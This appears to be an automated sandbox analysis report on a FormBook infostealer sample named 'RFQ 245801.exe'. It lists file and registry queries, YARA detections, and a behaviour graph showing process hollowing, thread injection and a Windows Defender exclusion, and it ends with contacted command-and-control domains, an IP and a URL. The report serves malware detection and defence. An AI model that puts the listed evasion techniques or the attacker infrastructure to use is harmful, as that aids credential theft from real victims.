Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_00645FE5
Source: C:\Users\user\Desktop\RFQ 245801.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00644B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx, 7_2_00644B96
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528045 Sample: RFQ 245801.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 37 www.venir-bienne.info 2->37 39 www.sx9u.shop 2->39 41 9 other IPs or domains 2->41 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 12 other signatures 2->51 11 RFQ 245801.exe 4 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\RFQ 245801.exe.log, CSV 11->35 dropped 57 Adds a directory exclusion to Windows Defender 11->57 59 Injects a PE file into a foreign processes 11->59 15 RFQ 245801.exe 11->15         started        18 powershell.exe 23 11->18         started        20 RFQ 245801.exe 11->20         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 77 2 other signatures 15->77 22 explorer.exe 55 1 15->22 injected 75 Loading BitLocker PowerShell Module 18->75 26 conhost.exe 18->26         started        process9 dnsIp10 43 www.j88.travel 188.114.96.3, 49743, 80 CLOUDFLARENETUS European Union 22->43 53 System process connects to network (likely due to code injection or exploit) 22->53 55 Uses netstat to query active network connections and open ports 22->55 28 NETSTAT.EXE 22->28         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 28->61 63 Maps a DLL or memory area into another process 28->63 65 Tries to detect virtualization through RDTSC time measurements 28->65 67 Switches to a custom stack to bypass stack traces 28->67 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 www.j88.travel European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.j88.travel 188.114.96.3 true
www.oko.events 185.26.122.70 true
www.458881233.men unknown unknown
www.khizmetlergirisyapzzz2024.net unknown unknown
www.ridges-freezers-56090.bond unknown unknown
www.ilw.legal unknown unknown
www.sx9u.shop unknown unknown
www.venir-bienne.info unknown unknown
www.delark.click unknown unknown
www.02s-pest-control-us-ze.fun unknown unknown
www.earing-tests-69481.bond unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF true
    		unknown